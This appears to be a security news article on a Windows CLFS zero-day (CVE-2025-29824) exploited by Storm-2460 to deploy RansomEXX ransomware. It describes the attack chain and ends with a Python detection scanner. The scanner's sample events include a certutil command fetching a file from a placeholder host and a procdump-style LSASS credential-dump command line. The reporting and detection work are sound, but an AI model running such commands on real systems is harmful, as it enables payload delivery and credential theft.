Microsoft: Windows CLFS Weakness Could Result in ‘Extensive Deployment and Activation of Ransomware’

Microsoft has disclosed a zero-day vulnerability in the Windows Common Log File System (CLFS) that is being exploited in the wild to deploy ransomware. Targets so far include organizations in the information technology, real estate, finance, technology, and retail sectors, located in the United States, Spain, Venezuela, and Saudi Arabia.
The vulnerability, tracked as CVE-2025-29824 and rated “important,” lies in the CLFS kernel driver. It allows an attacker who already has standard user access to escalate privileges locally. With those elevated rights, the attacker can spread and detonate ransomware across a network, as described in a blog post from the Microsoft Threat Intelligence Center.
The CLFS driver is a core Windows component that handles writing transaction logs. Abusing it can give an attacker SYSTEM privileges, after which they can exfiltrate data or establish persistent backdoors. Microsoft regularly finds elevation-of-privilege vulnerabilities in CLFS; the most recent one was patched in December.
In the cases Microsoft observed, the “PipeMagic” malware was deployed first, and the attackers then exploited CVE-2025-29824 to escalate their privileges. PipeMagic gives attackers remote control of a compromised system, letting them execute commands and install additional malicious tools.
Responsible Party for the Exploitation
Microsoft attributes the exploitation of this vulnerability, together with the PipeMagic deployment and the ransomware, to the threat actor Storm-2460, which it links to the RansomEXX group.
Previously known as Defray777, the group emerged in 2018. It has targeted high-profile organizations including the Texas Department of Transportation, the Brazilian government, and the Taiwanese hardware maker GIGABYTE, and has been associated with Russian individuals.
The US Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability, which carries a CVSS score of 7.8, to its Known Exploited Vulnerabilities catalog, requiring federal civilian agencies to apply the patch by April 29.
Systems Affected: Windows 10, Windows 11, and Windows Server
Security updates released on April 8 fix the vulnerability in Windows 11, Windows Server 2022, and Windows Server 2019. Fixes for Windows 10 (x64 and 32-bit) are still pending; Microsoft says they will be released “promptly” and that “customers will receive a notification through a revision to this CVE information” once the updates are available.
Systems running Windows 11 version 24H2 or later are not affected by this exploit even though the vulnerability is present, because access to certain system information is restricted to users holding the “SeDebugPrivilege” privilege, which standard users normally do not have.
Operational Details of the Exploitation
Microsoft observed the attackers using the certutil command-line tool to download a malicious MSBuild file onto the victim’s machine.
The file, which contained an encrypted PipeMagic payload, was hosted on a legitimate third-party website that had been compromised to serve the threat actor’s malware. One of the domains PipeMagic communicated with was aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which has since been taken down.
After decrypting and executing PipeMagic in memory, the attackers used a dllhost.exe process to leak kernel addresses (memory locations) to user mode. They then overwrote the process’s token, which determines what the process is permitted to do, with the value 0xFFFFFFFF, granting it full privileges and allowing code to be injected into SYSTEM-level processes.
Next, they injected a payload into the SYSTEM winlogon.exe process, which in turn injected the Sysinternals procdump.exe utility into another dllhost.exe process and ran it. This let the threat actor dump the memory of LSASS, the process that holds user credentials.
Once credentials had been stolen, the ransomware was deployed. Microsoft observed files being encrypted, a random extension being appended to them, and a ransom note named !_READ_ME_REXX2_!.txt being dropped on affected systems.
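As an added defender's example, not code from the article or from Microsoft, the small Python scanner below flags the process and file events described above in constructed endpoint telemetry; the event schema, rule names, placeholder hosts and paths, and the sample events are all assumptions.

```python
import re
from typing import Iterable

# Indicators drawn from the article's description of the Storm-2460 chain; the
# rules, field names and sample events below are constructed for illustration.
RANSOM_NOTE = "!_READ_ME_REXX2_!.txt"

def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return re.split(r"[\\/]", path.lower())[-1]

def classify(event: dict) -> list[str]:
    """Return the names of every rule an event matches; [] means nothing fired."""
    hits = []
    img, parent = _base(event.get("image", "")), _base(event.get("parent", ""))
    cmd = event.get("cmdline", "").lower()
    if event["type"] == "process":
        # certutil fetching a remote file: LOLBin download of the MSBuild payload
        if img == "certutil.exe" and re.search(r"https?://", cmd):
            hits.append("certutil_remote_download")
        # dllhost.exe is normally started by svchost.exe (DCOM), not winlogon.exe
        if parent == "winlogon.exe" and img == "dllhost.exe":
            hits.append("winlogon_spawns_dllhost")
        # procdump (or a copy running under another image name) aimed at LSASS
        if "lsass" in cmd and img != "lsass.exe" and ("procdump" in img or "-ma" in cmd.split()):
            hits.append("lsass_memory_dump")
    elif event["type"] == "file" and _base(event.get("target", "")) == RANSOM_NOTE.lower():
        hits.append("rexx2_ransom_note")
    return hits

def scan(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Flatten (event id, rule name) pairs for every matching event."""
    return [(e["id"], rule) for e in events for rule in classify(e)]

# Constructed sample telemetry (placeholder hosts and paths, not real IoCs)
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -urlcache -f http://compromised-site.example/build.proj C:\\Temp\\build.proj"},
    {"id": "e2", "type": "process", "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\dllhost.exe", "cmdline": "dllhost.exe /Processid:{PLACEHOLDER}"},
    {"id": "e3", "type": "process", "parent": "C:\\Windows\\System32\\winlogon.exe",
     "image": "C:\\Windows\\System32\\dllhost.exe", "cmdline": "dllhost.exe -accepteula -ma lsass.exe"},
    {"id": "e4", "type": "file", "image": "C:\\Users\\Public\\unknown.exe",
     "target": "C:\\Users\\alice\\Documents\\!_READ_ME_REXX2_!.txt"},
]

if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"{event_id}: {rule}")
```

Event e2 (a normal DCOM-launched dllhost.exe) produces no hit, which is the benign baseline the winlogon rule is meant to distinguish from.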
